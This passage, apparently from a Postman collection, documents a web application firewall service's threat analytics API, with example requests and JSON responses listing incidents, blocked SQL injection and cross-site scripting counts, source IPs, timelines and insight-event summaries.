  },\n    {\n        \"name\": \"Bot Attacks(Crawler)\",\n        \"percentage\": 8.6\n    },\n    {\n        \"name\": \"Cross Site Scripting\",\n        \"percentage\": 5.7\n    }\n]"},{"id":"1b168af1-84da-4818-a86d-07c341413308","name":"Success for Top Attacked Resources","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id=http_host&action=all&time_range=7d&host=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","dashboard"],"query":[{"key":"widget_id","value":"http_host"},{"key":"action","value":"all"},{"key":"time_range","value":"7d"},{"key":"host","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"name\": \"www.website.com\",\n        \"threat_count\": 9160,\n        \"monitor_count\": 352,\n        \"block_count\": 8808\n    },\n    {\n        \"name\": \"it.www.website.com\",\n        \"threat_count\": 67,\n        \"monitor_count\": 64,\n        \"block_count\": 3\n    }\n]"},{"id":"cdd607a8-2ff2-4e17-a774-0a265e9a8661","name":"Success for Top 10 Incidents","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/dashboard?widget_id=high_risk&action=all&time_range=7d&host=all","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","dashboard"],"query":[{"key":"widget_id","value":"high_risk"},{"key":"action","value":"all"},{"key":"time_range","value":"7d"},{"key":"host","value":"all"}]}},"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"[\n    {\n        \"incident_id\": \"us-east-1_6_42\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_36\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_41\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_35\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_21\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"eu-central-1_6_26\",\n        \"risk\": \"High\",\n        \"name\": \"Cross Site Scripting, Anomaly Detection by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_28\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"eu-central-1_6_20\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"us-east-1_6_24\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    },\n    {\n        \"incident_id\": \"eu-central-1_6_95\",\n        \"risk\": \"High\",\n        \"name\": \"Anomaly Detection, Illegal OpenAPI Requests(Machine Learning) by 209.121.4.2  from United States\"\n    }\n]"}],"_postman_id":"6b0456e6-ef9c-4094-8c9e-f42489e829fd"},{"name":"Get Incidents List","id":"dd1202e6-e8eb-4921-a9c6-68d3afb29428","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/incidents?size={{page_size}}&page={{page_number}}&local_timezone={{time zone}}&time_range={{time_range}}&filter={{filter_string}}","urlObject":{"protocol":"https","path":["v1","threat_analytics","incidents"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Should be integer and greater than 0</p>\n","type":"text/plain"},"key":"size","value":"{{page_size}}"},{"description":{"content":"<p>Should be integer and greater than 0</p>\n","type":"text/plain"},"key":"page","value":"{{page_number}}"},{"description":{"content":"<p>local timezone represented in minutes. </p>\n","type":"text/plain"},"key":"local_timezone","value":"{{time zone}}"},{"description":{"content":"<p>Could be 24h-last 24 hours, or 7d-last 7 days, etc.</p>\n","type":"text/plain"},"key":"time_range","value":"{{time_range}}"},{"description":{"content":"<p>HTTP Encode string which should be able to parsed to json format.</p>\n","type":"text/plain"},"key":"filter","value":"{{filter_string}}"}],"variable":[]}},"response":[{"id":"03b4d07d-9449-4204-9c37-1e8abf6d2e69","name":"Get Incidents List with default params","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents?size=20&page=1&local_timezone=-420&time_range=7d&filter=%5B%5D","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents"],"query":[{"key":"size","value":"20","description":"Should be integer and greater than 0"},{"key":"page","value":"1","description":"Should be integer and greater than 0"},{"key":"local_timezone","value":"-420","description":"local timezone represented in minutes. "},{"key":"time_range","value":"7d","description":"Could be 24h-last 24 hours, or 7d-last 7 days, etc."},{"key":"filter","value":"%5B%5D","description":"HTTP Encode string which should be able to parsed to json format."}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 3,\n    \"result\": [\n        {\n            \"incident_id\": \"ap-southeast-1_4_137\",\n            \"risk\": \"Moderate\",\n            \"description\": \"Bot Attacks(Crawler) by 104.131.39.34  from United States\",\n            \"host_desc\": \"On host cwhu-test.fortiweb-cloud-test.com\",\n            \"acknowledged\": false,\n            \"false_positive\": false,\n            \"threat_count\": 1,\n            \"block_count\": 1,\n            \"lasttime\": 1651960985000,\n            \"blocked\": \"100.0%\"\n        },\n        {\n            \"incident_id\": \"ap-southeast-1_4_120\",\n            \"risk\": \"Moderate\",\n            \"description\": \"SQL Injection by 4 IPs from Taiwan and Japan\",\n            \"host_desc\": \"On host cwhu-test.fortiweb-cloud-test.com\",\n            \"acknowledged\": false,\n            \"false_positive\": false,\n            \"threat_count\": 43,\n            \"block_count\": 43,\n            \"lasttime\": 1651740557000,\n            \"blocked\": \"100.0%\"\n        },\n        {\n            \"incident_id\": \"ap-southeast-1_4_4\",\n            \"risk\": \"Moderate\",\n            \"description\": \"SQL Injection by 207.81.251.233  from Canada\",\n            \"host_desc\": \"On host krisc80106.fortiweb-cloud-test.com\",\n            \"acknowledged\": false,\n            \"false_positive\": false,\n            \"threat_count\": 1,\n            \"block_count\": 0,\n            \"lasttime\": 1650431032000,\n            \"blocked\": \"0.0%\"\n        }\n    ]\n}"},{"id":"e7626bc4-99ad-40b1-9284-504e98c07907","name":"Get Incidents List with filters","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents?size=20&page=1&local_timezone=-420&time_range=7d&filter=%5B%7B%22id%22%3A%22action%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22enum%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22block%22%5D%7D%2C%7B%22id%22%3A%22risk%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22string%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22Moderate%22%5D%7D%2C%7B%22id%22%3A%22srccountry%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22enum%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22Japan%22%5D%7D%2C%7B%22id%22%3A%22acknowledged%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22string%22%3Atrue%7D%2C%22search%22%3A%22string%22%2C%22splitter%22%3A%22%2C%22%7D%2C%22value%22%3A%5B%22true%22%5D%7D%5D","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents"],"query":[{"key":"size","value":"20","description":"Should be integer and greater than 0"},{"key":"page","value":"1","description":"Should be integer and greater than 0"},{"key":"local_timezone","value":"-420","description":"local timezone represented in minutes. "},{"key":"time_range","value":"7d","description":"Could be 24h-last 24 hours, or 7d-last 7 days, etc."},{"key":"filter","value":"%5B%7B%22id%22%3A%22action%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22enum%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22block%22%5D%7D%2C%7B%22id%22%3A%22risk%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22string%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22Moderate%22%5D%7D%2C%7B%22id%22%3A%22srccountry%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22enum%22%3Atrue%7D%2C%22search%22%3A%22string%22%7D%2C%22value%22%3A%5B%22Japan%22%5D%7D%2C%7B%22id%22%3A%22acknowledged%22%2C%22logic%22%3A%7B%22is%22%3A%7B%22string%22%3Atrue%7D%2C%22search%22%3A%22string%22%2C%22splitter%22%3A%22%2C%22%7D%2C%22value%22%3A%5B%22true%22%5D%7D%5D","description":"[{\"id\":\"action\",\"logic\":{\"is\":{\"enum\":true},\"search\":\"string\"},\"value\":[\"block\"]},{\"id\":\"risk\",\"logic\":{\"is\":{\"string\":true},\"search\":\"string\"},\"value\":[\"Moderate\"]},{\"id\":\"srccountry\",\"logic\":{\"is\":{\"enum\":true},\"search\":\"string\"},\"value\":[\"Japan\"]},{\"id\":\"acknowledged\",\"logic\":{\"is\":{\"string\":true},\"search\":\"string\",\"splitter\":\",\"},\"value\":[\"true\"]}]"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 1,\n    \"result\": [\n        {\n            \"incident_id\": \"ap-southeast-1_4_120\",\n            \"risk\": \"Moderate\",\n            \"description\": \"SQL Injection by 4 IPs from Taiwan and Japan\",\n            \"host_desc\": \"On host cwhu-test.fortiweb-cloud-test.com\",\n            \"acknowledged\": true,\n            \"false_positive\": false,\n            \"threat_count\": 43,\n            \"block_count\": 43,\n            \"lasttime\": 1651740557000,\n            \"blocked\": \"100.0%\"\n        }\n    ]\n}"}],"_postman_id":"dd1202e6-e8eb-4921-a9c6-68d3afb29428"},{"name":"Get Incidents Details","id":"9936a07a-a6ec-4228-be94-7b47b9b2c68a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","urlObject":{"protocol":"https","path":["v1","threat_analytics","incidents",":incident_id"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"f31762e2-1754-4f96-9172-03364a3f5f3a","description":{"content":"<p>like us-east-1_4_120</p>\n","type":"text/plain"},"type":"any","value":"{{incident_id}}","key":"incident_id"}]}},"response":[{"id":"7e532f15-3d6b-49c2-b2f7-0314798ac437","name":"Get Incidents Details Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id"],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"incident_id\": \"us-east-1_4_120\",\n    \"risk\": \"Moderate\",\n    \"description\": \"SQL Injection by 4 IPs from Taiwan and Japan\",\n    \"host_desc\": \"On host test.fortiwebc.com\",\n    \"acknowledged\": false,\n    \"false_positive\": false,\n    \"threat_count\": 43,\n    \"block_count\": 43,\n    \"lasttime\": 1651740557000,\n    \"blocked\": \"100.0%\",\n    \"ep_id\": \"4488963652\",\n    \"app_name\": \"test_app\",\n    \"comments\": [],\n    \"attack_types\": [\n        \"SQL Injection\"\n    ],\n    \"cve_ids\": [\n        \"N/A\"\n    ],\n    \"hosts\": [\n        \"test.fortiwebc.com\"\n    ],\n    \"src_countries\": [\n        \"Taiwan\",\n        \"Japan\"\n    ],\n    \"firsttime\": 1651733378000,\n    \"src_ips\": [\n        {\n            \"211.75.180.100\": \"69.8%\"\n        },\n        {\n            \"61.222.58.223\": \"20.9%\"\n        },\n        {\n            \"1.169.118.81\": \"7.0%\"\n        },\n        {\n            \"Others\": \"2.3%\"\n        }\n    ],\n    \"http_urls\": [\n        {\n            \"/andie12\": \"95.3%\"\n        },\n        {\n            \"/auth\": \"2.3%\"\n        },\n        {\n            \"/\": \"2.3%\"\n        }\n    ]\n}"}],"_postman_id":"9936a07a-a6ec-4228-be94-7b47b9b2c68a"},{"name":"Get Incidents Threats Timeline","id":"8a3f667b-687f-40a0-b871-fcb24364af3a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/timeline","urlObject":{"protocol":"https","path":["v1","threat_analytics","incidents",":incident_id","timeline"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"374c32f5-df77-437a-8189-2d93236d1ae8","type":"any","value":"{{incident_id}}","key":"incident_id"}]}},"response":[{"id":"7d5a9b0e-59e1-4c38-9823-3d7b1e1a7fab","name":"Get Incidents Threats Timeline Success","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/timeline","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","timeline"],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"start\": 1651733378000,\n    \"end\": 1651740557000,\n    \"line_data\": [\n        {\n            \"line_name\": \"Threats\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 2,\n                    \"time\": 1651733160000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 16,\n                    \"time\": 1651733580000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 4,\n                    \"time\": 1651734000000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 0,\n                    \"time\": 1651734420000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 1,\n                    \"time\": 1651734840000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 0,\n                    \"time\": 1651735260000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 4,\n                    \"time\": 1651735680000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 8,\n                    \"time\": 1651736100000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1651736520000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 0,\n                    \"time\": 1651736940000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 1,\n                    \"time\": 1651737360000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 2,\n                    \"time\": 1651737780000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651738200000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651738620000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 0,\n                    \"time\": 1651739040000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 0,\n                    \"time\": 1651739460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651739880000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 5,\n                    \"time\": 1651740300000\n                }\n            ]\n        },\n        {\n            \"line_name\": \"Blocked\",\n            \"number\": [\n                {\n                    \"id\": 1,\n                    \"value\": 2,\n                    \"time\": 1651733160000\n                },\n                {\n                    \"id\": 2,\n                    \"value\": 16,\n                    \"time\": 1651733580000\n                },\n                {\n                    \"id\": 3,\n                    \"value\": 4,\n                    \"time\": 1651734000000\n                },\n                {\n                    \"id\": 4,\n                    \"value\": 0,\n                    \"time\": 1651734420000\n                },\n                {\n                    \"id\": 5,\n                    \"value\": 1,\n                    \"time\": 1651734840000\n                },\n                {\n                    \"id\": 6,\n                    \"value\": 0,\n                    \"time\": 1651735260000\n                },\n                {\n                    \"id\": 7,\n                    \"value\": 4,\n                    \"time\": 1651735680000\n                },\n                {\n                    \"id\": 8,\n                    \"value\": 8,\n                    \"time\": 1651736100000\n                },\n                {\n                    \"id\": 9,\n                    \"value\": 0,\n                    \"time\": 1651736520000\n                },\n                {\n                    \"id\": 10,\n                    \"value\": 0,\n                    \"time\": 1651736940000\n                },\n                {\n                    \"id\": 11,\n                    \"value\": 1,\n                    \"time\": 1651737360000\n                },\n                {\n                    \"id\": 12,\n                    \"value\": 2,\n                    \"time\": 1651737780000\n                },\n                {\n                    \"id\": 13,\n                    \"value\": 0,\n                    \"time\": 1651738200000\n                },\n                {\n                    \"id\": 14,\n                    \"value\": 0,\n                    \"time\": 1651738620000\n                },\n                {\n                    \"id\": 15,\n                    \"value\": 0,\n                    \"time\": 1651739040000\n                },\n                {\n                    \"id\": 16,\n                    \"value\": 0,\n                    \"time\": 1651739460000\n                },\n                {\n                    \"id\": 17,\n                    \"value\": 0,\n                    \"time\": 1651739880000\n                },\n                {\n                    \"id\": 18,\n                    \"value\": 5,\n                    \"time\": 1651740300000\n                }\n            ]\n        }\n    ]\n}"}],"_postman_id":"8a3f667b-687f-40a0-b871-fcb24364af3a"},{"name":"Get Incidents Sample Logs","id":"6447f100-f2dc-44a6-9069-56d083211f8d","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name={{group_name}}","urlObject":{"protocol":"https","path":["v1","threat_analytics","incidents",":incident_id","aggs"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Use 'logs' to get view sample attack logs of a specific incident.</p>\n","type":"text/plain"},"key":"name","value":"{{group_name}}"}],"variable":[{"id":"57ddf751-aebb-4e32-a1c6-9ad9123b174d","type":"any","value":"{{incident_id}}","key":"incident_id"}]}},"response":[{"id":"a5ff9442-8972-4363-ba19-73bfcdbf380e","name":"Get Incidents Log Samples","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=logs","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"logs"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 37,\n    \"result\": [\n        {\n            \"msg\": \"SQL/XSS Syntax Based Detection: Line Comments triggered by Parameter (category)\",\n            \"log_id\": \"20000050\",\n            \"threat_level\": \"Severe\",\n            \"signature_cve_id\": \"N/A\",\n            \"owasp_top10\": \"A03:2021-Injection\",\n            \"main_type\": \"SQL/XSS Syntax Based Detection\",\n            \"http_url\": \"/andie12\",\n            \"srccountry\": \"Japan\",\n            \"src_ip\": \"52.114.32.28\",\n            \"signature_id\": \"N/A\",\n            \"date_time\": \"2022-05-05T14:57:04+08:00\",\n            \"sub_type\": \"Line Comments\",\n            \"action\": \"Block\",\n            \"msg_id\": \"000000062787\",\n            \"country_flag\": \"JP\",\n            \"_id\": \"bf20181d-5511-4755-acc9-8504997552d3\"\n        },\n        {\n            \"msg\": \"SQL/XSS Syntax Based Detection: Line Comments triggered by Parameter (category)\",\n            \"log_id\": \"20000050\",\n            \"threat_level\": \"Severe\",\n            \"signature_cve_id\": \"N/A\",\n            \"owasp_top10\": \"A03:2021-Injection\",\n            \"main_type\": \"SQL/XSS Syntax Based Detection\",\n            \"http_url\": \"/andie12\",\n            \"srccountry\": \"Taiwan\",\n            \"src_ip\": \"211.75.180.100\",\n            \"signature_id\": \"N/A\",\n            \"date_time\": \"2022-05-05T16:49:17+08:00\",\n            \"sub_type\": \"Line Comments\",\n            \"action\": \"Block\",\n            \"msg_id\": \"000000063114\",\n            \"country_flag\": \"TW\",\n            \"_id\": \"77dffd15-b551-41a7-892c-9d0eb673f56e\"\n        }\n    ]\n}"}],"_postman_id":"6447f100-f2dc-44a6-9069-56d083211f8d"},{"name":"Get Incidents Threats By Group","id":"830635b5-6c79-4d92-ace7-9cdaf50364de","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name={{group_name}}","urlObject":{"protocol":"https","path":["v1","threat_analytics","incidents",":incident_id","aggs"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Group by value. Could be one of attack_type, srccountry, http_host, src_ip, http_url, signature_cve_id, owasp_top10.</p>\n","type":"text/plain"},"key":"name","value":"{{group_name}}"}],"variable":[{"id":"f4298684-a6cd-4ddd-a2ff-49c6112a4883","type":"any","value":"{{incident_id}}","key":"incident_id"}]}},"response":[{"id":"9953fe75-55ec-43d5-8e6f-dda3f41084f4","name":"Get Incidents Threats by Attack Type","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=attack_type","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"attack_type"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 1,\n    \"result\": [\n        {\n            \"name\": \"SQL Injection\",\n            \"threat_count\": 43,\n            \"monitor_count\": 0,\n            \"block_count\": 43\n        }\n    ]\n}"},{"id":"1d374b14-30e4-47c2-9ce9-4202af7f9e97","name":"Get Incidents Threats by source country","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=srccountry","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"srccountry"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 2,\n    \"result\": [\n        {\n            \"name\": \"Taiwan\",\n            \"threat_count\": 42,\n            \"monitor_count\": 0,\n            \"block_count\": 42\n        },\n        {\n            \"name\": \"Japan\",\n            \"threat_count\": 1,\n            \"monitor_count\": 0,\n            \"block_count\": 1\n        }\n    ]\n}"},{"id":"7b117269-7814-4208-b2be-c15a7c029589","name":"Get Incidents Threats by Host","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=srccountry","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"srccountry"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 1,\n    \"result\": [\n        {\n            \"name\": \"test.fortiweb-c.com\",\n            \"threat_count\": 43,\n            \"monitor_count\": 0,\n            \"block_count\": 43\n        }\n    ]\n}"},{"id":"85750107-32a2-489f-b89b-f38ae733d7cf","name":"Get Incidents Threats by Source IP","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=src_ip","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"src_ip"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 4,\n    \"result\": [\n        {\n            \"name\": \"211.75.180.100\",\n            \"threat_count\": 30,\n            \"monitor_count\": 0,\n            \"block_count\": 30\n        },\n        {\n            \"name\": \"61.222.58.223\",\n            \"threat_count\": 9,\n            \"monitor_count\": 0,\n            \"block_count\": 9\n        },\n        {\n            \"name\": \"1.169.118.81\",\n            \"threat_count\": 3,\n            \"monitor_count\": 0,\n            \"block_count\": 3\n        },\n        {\n            \"name\": \"52.114.32.28\",\n            \"threat_count\": 1,\n            \"monitor_count\": 0,\n            \"block_count\": 1\n        }\n    ]\n}"},{"id":"90bf8370-b3ec-4899-bcf9-e79f694cfdfd","name":"Get Incidents Threats by URL","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=http_url","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"http_url"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 3,\n    \"result\": [\n        {\n            \"name\": \"/andie12\",\n            \"threat_count\": 41,\n            \"monitor_count\": 0,\n            \"block_count\": 41\n        },\n        {\n            \"name\": \"/auth\",\n            \"threat_count\": 1,\n            \"monitor_count\": 0,\n            \"block_count\": 1\n        },\n        {\n            \"name\": \"/\",\n            \"threat_count\": 1,\n            \"monitor_count\": 0,\n            \"block_count\": 1\n        }\n    ]\n}"},{"id":"ecb49303-4660-47da-85e2-0eb916b722b6","name":"Get Incidents Threats by Signature_cve_id","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=signature_cve_id","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"signature_cve_id"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 1,\n    \"result\": [\n        {\n            \"name\": \"CVE-2021-25634\",\n            \"threat_count\": 43,\n            \"monitor_count\": 0,\n            \"block_count\": 43\n        }\n    ]\n}"},{"id":"73e3d9a3-8332-48cd-88af-aaba8b85bb38","name":"Get Incidents Threats by OWASP_Top10","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.tim.waasonline.com/v1/threat_analytics/incidents/:incident_id/aggs?name=owasp_top10","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","threat_analytics","incidents",":incident_id","aggs"],"query":[{"key":"name","value":"owasp_top10"}],"variable":[{"key":"incident_id","value":"us-east-1_4_120"}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"total\": 1,\n    \"result\": [\n        {\n            \"name\": \"A03:2021-Injection\",\n            \"threat_count\": 43,\n            \"monitor_count\": 0,\n            \"block_count\": 43\n        }\n    ]\n}"}],"_postman_id":"830635b5-6c79-4d92-ace7-9cdaf50364de"},{"name":"Get Insight Events Summary","id":"b4d844ba-0056-44e2-b2c1-bccb896fd101","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/insight/summary","description":"<p>Get insight events summary.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <strong>Authentication</strong> section for API key secret details.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","threat_analytics","insight","summary"],"host":["api","tim","waasonline","com"],"query":[],"variable":[]}},"response":[{"id":"b90946ba-2e79-4c03-8c6a-9441b721ad2b","name":"Get Insight Events Summary","originalRequest":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/insight/summary"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Successfully\",\n    \"result\": {\n        \"summary\":[\n          {\"type\":\"exposed_server\",  \"active\": 2},\n          {\"type\":\"unprotected_host\",  \"active\": 4},\n          {\"type\":\"trust_ip\",  \"active\": 0},\n          {\"type\": \"monitor_service\", \"active\": 0},\n          {\"type\": \"waf_config_alarm\", \"active\": 0}\n\n        ]\n    }\n}"}],"_postman_id":"b4d844ba-0056-44e2-b2c1-bccb896fd101"},{"name":"Get Insight Events","id":"2a9115e2-172a-435d-866d-957843530472","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.tim.waasonline.com/v1/threat_analytics/insight?type={{event_type}}&size={{size}}&cursor={{cursor}}&forward={{forward}}","description":"<p>Get insight events by event type.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <strong>Authentication</strong> section for API key secret details.</p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","threat_analytics","insight"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Events type should be in 'exposed_server', 'trust_ip', 'unprotectd_host'</p>\n","type":"text/plain"},"key":"type","value":"{{event_type}}"},{"description":{"content":"<p>An integer, the page size. The value shall be 10, 20, 30.</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>To list the items of the first page, leave the cursor value empty.\nTo go forward to next page, get the value of the \"next_cursor\" parameter in the result of the current page, then paste it here as the cursor value.\nTo go to the previous page, get the \"prev_cursor\" value, then paste it here as the cursor value.</p>\n","type":"text/plain"},"key":"cursor","value":"{{cursor}}"},{"description":{"content":"<p>True: the next page;\nFalse: the previous page.</p>\n","type":"text/plain"},"key":"forward","value":"{{forward}}"}],"variable":[]}},"response":[{"id":"52b59e3c-2eba-4122-b5e5-79cb9293552d","name":"Get Exposed Server 